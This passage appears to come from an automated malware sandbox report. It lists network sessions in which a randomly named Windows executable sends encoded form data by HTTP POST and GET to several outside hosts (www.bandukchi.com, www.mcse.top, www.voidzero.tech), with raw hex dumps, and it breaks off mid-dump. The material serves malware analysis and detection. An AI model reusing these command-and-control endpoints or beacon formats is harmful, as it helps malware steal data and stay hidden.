                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 65 4f 51 51 6c 2f 65 41 44 57 54 32 4f 78 2b 4a 38 30 42 74 32 78 64 73 6d 35 67 6f 48 46 63 6a 7a 2b 58 54 78 2f 4c 4e 51 37 33 35 44 78 46 72 39 52 55 78 45 63 4a 63 63 39 35 63 38 6b 6e 6e 4b 64 55 54 4b 44 42 2f 43 39 58 4b 79 67 34 53 47 50 79 77 5a 4b 6b 6f 41 37 36 37 35 52 46 63 72 66 72 67 4a 68 63 44 51 70 41 2b 73 78 6c 71 39 2f 70 43 59 31 41 75 6d 34 47 78 64 34 64 74 55 73 5a 6a 6f 63 51 2f 39 38 53 50 48 53 53 61 79 5a 64 4b 5a 6a 30 57 6d 70 74 6e 68 72 4e 72 73 64 41 76 56 55 4f 31 36 2b 2b 78 68 42 53 68 46 79 33 6f 51 4d 79 4d 4d 45 47 55 45 61 42 39 43 48 56 57 68 47 51 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=eOQQl/eADWT2Ox+J80Bt2xdsm5goHFcjz+XTx/LNQ735DxFr9RUxEcJcc95c8knnKdUTKDB/C9XKyg4SGPywZKkoA7675RFcrfrgJhcDQpA+sxlq9/pCY1Aum4Gxd4dtUsZjocQ/98SPHSSayZdKZj0WmptnhrNrsdAvVUO16++xhBShFy3oQMyMMEGUEaB9CHVWhGQ=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              30192.168.2.5500123.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:36.579447031 CEST763OUTPOST /4nqw/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Origin: http://www.bandukchi.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.bandukchi.com/4nqw/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 65 4f 51 51 6c 2f 65 41 44 57 54 32 50 52 75 4a 2b 58 70 74 6e 42 64 72 71 5a 67 6f 4d 6c 63 6e 7a 2b 62 54 78 36 7a 6a 54 4e 50 35 43 56 42 72 38 51 55 78 44 63 4a 63 54 64 35 56 78 45 6e 77 4b 64 49 74 4b 47 68 2f 43 39 54 4b 79 69 77 53 47 39 61 78 62 61 6b 71 5a 72 36 35 6e 68 46 63 72 66 72 67 4a 68 5a 75 51 70 34 2b 74 41 56 71 38 64 42 42 57 56 41 74 68 34 47 78 58 59 64 70 55 73 59 4f 6f 5a 78 6f 39 36 57 50 48 51 4b 61 7a 4e 42 4a 54 6a 31 54 37 35 74 78 6b 5a 73 47 70 4d 30 56 65 57 44 4c 36 59 71 34 70 58 2f 4c 66 51 2f 41 44 73 65 30 63 58 4f 6a 56 71 67 55 59 6b 46 6d 2f 52 45 39 57 59 55 45 75 74 71 37 64 37 4a 33 4a 32 69 54 77 4e 58 67
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=eOQQl/eADWT2PRuJ+XptnBdrqZgoMlcnz+bTx6zjTNP5CVBr8QUxDcJcTd5VxEnwKdItKGh/C9TKyiwSG9axbakqZr65nhFcrfrgJhZuQp4+tAVq8dBBWVAth4GxXYdpUsYOoZxo96WPHQKazNBJTj1T75txkZsGpM0VeWDL6Yq4pX/LfQ/ADse0cXOjVqgUYkFm/RE9WYUEutq7d7J3J2iTwNXg


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              31192.168.2.5500133.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:40.036957979 CEST1780OUTPOST /4nqw/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Origin: http://www.bandukchi.com
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.bandukchi.com/4nqw/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 65 4f 51 51 6c 2f 65 41 44 57 54 32 50 52 75 4a 2b 58 70 74 6e 42 64 72 71 5a 67 6f 4d 6c 63 6e 7a 2b 62 54 78 36 7a 6a 54 4f 76 35 44 6d 4a 72 39 7a 4d 78 43 63 4a 63 61 39 35 59 78 45 6e 78 4b 64 42 71 4b 47 39 46 43 37 50 4b 39 6e 38 53 41 4a 4f 78 52 61 6b 71 45 37 36 30 35 52 46 73 72 66 37 38 4a 68 70 75 51 70 34 2b 74 43 4e 71 34 50 70 42 62 31 41 75 6d 34 47 39 64 34 63 2b 55 73 78 37 6f 5a 39 34 39 70 65 50 45 7a 79 61 2b 65 70 4a 66 6a 31 64 6f 4a 73 79 6b 5a 67 46 70 4d 5a 75 65 54 2f 78 36 66 65 34 36 7a 32 70 48 55 2f 2f 59 36 54 55 66 6e 37 50 4e 76 38 6b 53 6c 46 30 6a 6a 41 68 57 70 73 55 6b 37 4b 6c 49 4b 51 41 4b 58 62 63 68 37 2f 76 53 6a 52 41 47 4a 66 2b 65 45 72 6d 49 50 41 43 67 7a 64 78 47 5a 5a 65 7a 32 30 61 36 76 4d 44 79 48 4a 78 73 54 52 4f 4e 38 57 72 50 65 35 5a 33 55 4b 79 54 62 30 57 56 66 2f 77 43 63 63 72 43 66 33 78 70 31 42 32 51 4e 45 2f 4c 61 2b 66 30 37 72 35 38 4f 6f 4f 4a 70 53 38 54 58 67 44 76 75 6e 67 77 4d 6f 56 37 61 65 56 56 36 61 68 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=eOQQl/eADWT2PRuJ+XptnBdrqZgoMlcnz+bTx6zjTOv5DmJr9zMxCcJca95YxEnxKdBqKG9FC7PK9n8SAJOxRakqE7605RFsrf78JhpuQp4+tCNq4PpBb1Aum4G9d4c+Usx7oZ949pePEzya+epJfj1doJsykZgFpMZueT/x6fe46z2pHU//Y6TUfn7PNv8kSlF0jjAhWpsUk7KlIKQAKXbch7/vSjRAGJf+eErmIPACgzdxGZZez20a6vMDyHJxsTRON8WrPe5Z3UKyTb0WVf/wCccrCf3xp1B2QNE/La+f07r58OoOJpS8TXgDvungwMoV7aeVV6ah+OGwmfZGq6S7VLyxqOGfWXyZGd+Oz0WSLTURRpSTyn2yIKrOZWSL1rMfQqgfkTPj1Dar3IBKj8p8Ev0YRMsK5WdlMe32tWq/m4CTIBLm/pc6rXJ9ga/d5BeChq9O5MM6qxH7aZTZgLtwMqF3/J/djgBSIPvm3O9u4bTi57+ytRKm8ppBHMLJ4R/sAqvbR74Hsi6MqqKhSxTBnreS+w3vsjbg3g/P/MZSWZlg7CXO9pEuEnmlfQ0u2jFXEwe1J+kGpf+O9SUhmFOPqS04XidE3ELquYLUtBbgnRwOw9nJF98TaeZWwC7mpXYYgGBxsvMpv7Zq+nR8tI1MLLyugQ1MtUg5QE4T/YOlaROcEvEwWIkBnkAYHR19A8bgSyCmAdS5YL3T5xJCTo2+Ods7XBUym173ZO473xJKDZwy9ycRBbp2xrVK8Nm9uX9joAWl18ke1vQoXQgWbsc3tfs9ozjaXN1xoMpclqEDS3eiaxwI94Yw7RyQjOA7x5I5s3RilXfG9Q/2Zn/IlymUmEnZ2HhIRpU1o62u2tyn+wriOV2jqqkkNzbspulFx2Tlw56C+PRrmhrpMbEosL79/btHvn+HZzIynLQFErTPs9p5HWP2P8buFoncdIjVETXefVkTUkhZOcCmDfTtL+NRCP3K18tYjaf/dEJFU+PIjo [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              32192.168.2.5500143.33.130.190802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:42.567866087 CEST483OUTGET /4nqw/?7Bohe=TM4wmIiUDmnTKniklQ90uhNUhJ9wAlE9nf/Yl9jXXOP3K1JO7ypWLJJbcPRG/mn1E4sifjVCDcv63SEcY+fHR48yBI63+DhGjujcAAYsRe1/gzF87OhGQiowvZSxcJ02Hg==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.bandukchi.com
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:43.190896988 CEST403INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Server: openresty
                                                                                                                                                                                                                                              Date: Thu, 24 Oct 2024 13:19:43 GMT
                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                              Content-Length: 263
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 42 6f 68 65 3d 54 4d 34 77 6d 49 69 55 44 6d 6e 54 4b 6e 69 6b 6c 51 39 30 75 68 4e 55 68 4a 39 77 41 6c 45 39 6e 66 2f 59 6c 39 6a 58 58 4f 50 33 4b 31 4a 4f 37 79 70 57 4c 4a 4a 62 63 50 52 47 2f 6d 6e 31 45 34 73 69 66 6a 56 43 44 63 76 36 33 53 45 63 59 2b 66 48 52 34 38 79 42 49 36 33 2b 44 68 47 6a 75 6a 63 41 41 59 73 52 65 31 2f 67 7a 46 38 37 4f 68 47 51 69 6f 77 76 5a 53 78 63 4a 30 32 48 67 3d 3d 26 76 44 3d 68 30 65 38 35 76 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?7Bohe=TM4wmIiUDmnTKniklQ90uhNUhJ9wAlE9nf/Yl9jXXOP3K1JO7ypWLJJbcPRG/mn1E4sifjVCDcv63SEcY+fHR48yBI63+DhGjujcAAYsRe1/gzF87OhGQiowvZSxcJ02Hg==&vD=h0e85v"}</script></head></html>


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              33192.168.2.550015154.9.228.56802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:49.000989914 CEST728OUTPOST /djad/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Origin: http://www.mcse.top
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.mcse.top/djad/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 44 69 70 6f 61 32 61 4b 44 56 73 58 6b 57 58 7a 7a 39 54 30 43 6e 76 6d 62 30 77 6a 70 7a 49 2f 56 37 78 48 68 63 55 6a 71 73 79 69 6f 54 75 50 6d 63 4a 2b 46 49 59 46 61 56 49 61 4c 49 77 6e 76 42 76 73 6f 68 56 37 59 68 78 35 56 7a 5a 31 7a 73 6c 73 44 68 35 73 45 4c 6b 72 32 70 37 44 69 2b 48 44 76 6c 35 71 58 33 73 41 63 35 62 55 53 6b 72 6e 65 55 70 4c 5a 4c 55 77 73 46 34 77 77 36 59 54 69 66 57 6a 6b 75 6e 36 74 33 58 4d 4d 49 5a 4a 6f 36 67 75 59 6a 33 75 4f 4e 70 6c 4b 6d 30 7a 69 53 6a 68 78 33 2b 6a 56 56 50 66 56 42 36 6d 4a 77 4c 79 62 39 6e 68 78 6a 37 4d 6c 38 72 56 74 5a 4d 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Dipoa2aKDVsXkWXzz9T0Cnvmb0wjpzI/V7xHhcUjqsyioTuPmcJ+FIYFaVIaLIwnvBvsohV7Yhx5VzZ1zslsDh5sELkr2p7Di+HDvl5qX3sAc5bUSkrneUpLZLUwsF4ww6YTifWjkun6t3XMMIZJo6guYj3uONplKm0ziSjhx3+jVVPfVB6mJwLyb9nhxj7Ml8rVtZM=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              34192.168.2.550016154.9.228.56802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:51.651341915 CEST748OUTPOST /djad/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Origin: http://www.mcse.top
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.mcse.top/djad/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 44 69 70 6f 61 32 61 4b 44 56 73 58 6c 32 4c 7a 32 65 4c 30 41 48 76 6e 56 55 77 6a 6d 54 49 37 56 37 74 48 68 64 51 7a 74 61 61 69 6f 78 32 50 6e 66 52 2b 47 49 59 46 52 31 49 62 49 34 78 72 76 42 54 43 6f 68 5a 37 59 68 6c 35 56 7a 70 31 77 66 4e 72 44 78 34 4b 4d 72 6b 70 34 4a 37 44 69 2b 48 44 76 6c 63 4e 58 33 6b 41 64 49 4c 55 52 42 48 67 51 30 70 4d 4f 37 55 77 6d 6c 34 38 77 36 59 68 69 65 4c 4d 6b 6f 6a 36 74 32 6e 4d 4e 5a 5a 49 78 4b 67 33 55 7a 32 4f 46 59 4e 73 50 56 59 38 68 79 6d 79 79 31 4c 65 51 6a 69 31 50 6a 79 4f 61 51 6e 4b 4c 75 76 57 67 54 61 6c 2f 66 37 6c 7a 4f 61 55 37 31 70 43 59 75 6a 51 62 68 42 6b 4e 38 77 41 67 77 79 44
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Dipoa2aKDVsXl2Lz2eL0AHvnVUwjmTI7V7tHhdQztaaiox2PnfR+GIYFR1IbI4xrvBTCohZ7Yhl5Vzp1wfNrDx4KMrkp4J7Di+HDvlcNX3kAdILURBHgQ0pMO7Uwml48w6YhieLMkoj6t2nMNZZIxKg3Uz2OFYNsPVY8hymyy1LeQji1PjyOaQnKLuvWgTal/f7lzOaU71pCYujQbhBkN8wAgwyD


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              35192.168.2.550017154.9.228.56802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:54.267066002 CEST1765OUTPOST /djad/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Origin: http://www.mcse.top
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 1242
                                                                                                                                                                                                                                              Referer: http://www.mcse.top/djad/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 44 69 70 6f 61 32 61 4b 44 56 73 58 6c 32 4c 7a 32 65 4c 30 41 48 76 6e 56 55 77 6a 6d 54 49 37 56 37 74 48 68 64 51 7a 74 61 69 69 72 45 69 50 6d 2f 74 2b 48 49 59 46 59 56 49 47 49 34 77 78 76 46 2f 4f 6f 68 6c 72 59 69 64 35 57 51 68 31 34 4f 4e 72 49 78 34 4b 41 4c 6b 71 32 70 37 7a 69 36 62 50 76 6c 4d 4e 58 33 6b 41 64 4b 6a 55 46 6b 72 67 64 55 70 4c 5a 4c 55 30 73 46 35 72 77 37 39 55 69 65 65 7a 6b 5a 66 36 74 57 33 4d 41 4c 68 49 75 36 67 31 58 7a 32 73 46 59 49 30 50 56 45 47 68 78 37 70 79 32 62 65 52 55 44 52 66 33 79 71 4d 69 62 74 59 5a 6e 36 68 6e 48 46 32 65 72 76 75 50 79 32 30 57 59 68 65 34 6a 68 52 67 6c 78 4a 37 34 37 6c 57 6a 5a 6a 72 59 36 5a 46 76 49 70 45 4d 77 56 77 63 42 70 6d 32 64 66 58 57 4d 36 7a 54 35 55 50 43 64 76 77 45 71 50 32 76 62 41 43 6b 32 34 46 4a 43 67 33 78 59 35 6a 4e 66 73 38 53 54 6c 6f 35 36 37 56 6a 51 74 48 4d 49 76 4e 66 52 65 4e 4e 77 67 6c 6f 78 6d 33 4f 53 69 41 7a 4f 5a 38 45 64 30 66 4f 61 62 54 38 66 6c 58 50 74 6a 69 72 62 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=Dipoa2aKDVsXl2Lz2eL0AHvnVUwjmTI7V7tHhdQztaiirEiPm/t+HIYFYVIGI4wxvF/OohlrYid5WQh14ONrIx4KALkq2p7zi6bPvlMNX3kAdKjUFkrgdUpLZLU0sF5rw79UieezkZf6tW3MALhIu6g1Xz2sFYI0PVEGhx7py2beRUDRf3yqMibtYZn6hnHF2ervuPy20WYhe4jhRglxJ747lWjZjrY6ZFvIpEMwVwcBpm2dfXWM6zT5UPCdvwEqP2vbACk24FJCg3xY5jNfs8STlo567VjQtHMIvNfReNNwgloxm3OSiAzOZ8Ed0fOabT8flXPtjirbs2FAOT+sj9Y7NVEz5rG3M6lAK2CvZL2MmRaXYVI4Fvtq9CYxCcblnjH9wZ9bXRrTBKBLLMra2Qcp04p1HBWKCrtjit/hVkt5wa+GGrKNwv3qB4PXvKVNJgOtUacNDj9unwVaxuL712K/V0FMzfjmN1AdO+7pR/VjnGD9T71avzuJ7birwOxQ0sovjJV2K0X9cn6Shp2eAWzc1dwT+AxTDdVZZR4TsNXxQiuv26i6PTbVV5FT6YED9kJ0Yp6aPX2cBBksrXsqXAHtUoY2olIY+prtigC78L513Ju/L/Z9wlJ5kORuc5JSUsCNNJpKVfUNyRNg0Bv7izcj650RrC6P+SsJcG1C5X7TFnoN+BKNJd2yG9bT+km9DTOcbh8CKsRlnjQBye/Gym3PW4sIbBv5FsrR4iiBr+VBFIs0nkSrzxGkO8fbrN5nJVN1n6iJx8b+L0P7W5B0eXRIiC7lGNPJUwIISS4MsogFDRF7ItwiXdTwzJ0K4GUmsCdkkqhYWgtmRV4/6HmBLmEJuxuskseY3wESIHbWPKcK2E0f0sGTWoX0pFBgu2J4JzsHDshmeW0IETZ6hXxC361v8zW+g7DlH3XDs2540KrY58Gj4sG3GChuGVckmGynzSVK9OOzILkWJkf7/UqgTFfHb5/3R3ZxpQQIPQ3nT+jCuZ [TRUNCATED]


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              36192.168.2.550018154.9.228.56802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:19:56.823652983 CEST478OUTGET /djad/?7Bohe=OgBIZAb3K3QVmDSyooTSIAO5Tll+jwwdUI93t9cTrZTAkguQuNIIHt4CXXwiEPUK7V7i0FBLQRxFESBesMpHDzV+LIhV5qbZyNO4rVJKeHZqQ73AKCfxWCZcLIU2txA0ig==&vD=h0e85v HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.mcse.top
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              37192.168.2.55001984.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:03.357672930 CEST743OUTPOST /2vbz/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Origin: http://www.voidzero.tech
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 206
                                                                                                                                                                                                                                              Referer: http://www.voidzero.tech/2vbz/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 6e 6e 6f 35 56 6e 7a 70 70 72 35 4d 44 2b 5a 6d 4a 6b 53 35 75 53 4b 68 73 7a 76 6d 47 70 63 2b 7a 39 61 32 42 59 4e 66 62 43 69 68 66 4b 50 52 64 75 42 75 65 57 6f 72 43 61 75 74 47 55 69 34 70 37 65 67 46 49 43 4a 57 66 62 4e 57 4a 35 61 35 41 71 52 54 2b 38 61 55 35 2b 71 32 4a 6d 4d 31 30 6a 68 50 34 75 71 2b 71 58 41 59 4d 7a 62 33 59 7a 68 6d 47 55 58 53 38 7a 5a 51 48 56 59 47 44 52 30 50 58 4a 4d 6b 36 44 53 55 59 7a 49 50 30 45 70 6d 6d 66 7a 68 67 67 59 78 6f 47 37 41 4a 61 69 39 63 72 34 31 6d 2f 62 44 6b 56 69 6e 43 6b 5a 74 67 39 63 30 70 49 6a 78 58 70 33 63 72 57 63 78 37 63 3d
                                                                                                                                                                                                                                              Data Ascii: 7Bohe=nno5Vnzppr5MD+ZmJkS5uSKhszvmGpc+z9a2BYNfbCihfKPRduBueWorCautGUi4p7egFICJWfbNWJ5a5AqRT+8aU5+q2JmM10jhP4uq+qXAYMzb3YzhmGUXS8zZQHVYGDR0PXJMk6DSUYzIP0EpmmfzhggYxoG7AJai9cr41m/bDkVinCkZtg9c0pIjxXp3crWcx7c=


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              38192.168.2.55002084.32.84.32802296C:\Program Files (x86)\nwdHBqGyECJMAInuUlrdrCMOzEsZYrLMweXEyIPPnrlSQJvgJCDwLXrPoElJJdIExiptznTA\qnPyaKsYTE.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Oct 24, 2024 15:20:05.903089046 CEST763OUTPOST /2vbz/ HTTP/1.1
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              Host: www.voidzero.tech
                                                                                                                                                                                                                                              Origin: http://www.voidzero.tech
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 226
                                                                                                                                                                                                                                              Referer: http://www.voidzero.tech/2vbz/
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                                                                                                                                                                                              Data Raw: 37 42 6f 68 65 3d 6e 6e 6f 35 56 6e 7a 70 70 72 35 4d 53 74 42 6d 4f 46 53 35 6d 53 4b 2b 67 54 76 6d 4e 4a 63 36 7a 39 57 32 42 63 39 50 62 30 79 68 66 76 72 52 63 73 70 75 64 57 6f 72 49 36 75 73 59 6b 69 6a 70 37 53 47 46 4a 2b 4a 57 66 50 4e 57 49 4a 61 35 32 69 57 53 75 38 59 49 35 2b 6b 79 4a 6d 4d 31 30 6a 68 50 34 72 46 2b 71 50 41 59 63 44 62 30 35 7a 69 72 6d 55 55 56 38 7a 5a 43 33 56 63 47 44 51 68 50 57 6c 71 6b 34 37 53 55 63 33 49 50 47 73 6d 73 6d 66 31 74 77 68 5a 78 62 66 30 61 49 61 71 79 74 61 59 6d 6b 50 61 4c 79 34 49 39 67 73 78 2b 41 52 6b 6b 36 41 55 67 6e 49 65 47 49 47 73 76 73 49 4f 72 6d 37 49 56 4d 51 79 62 56 69 58 42 41 2b 54 79 2f 5a 43
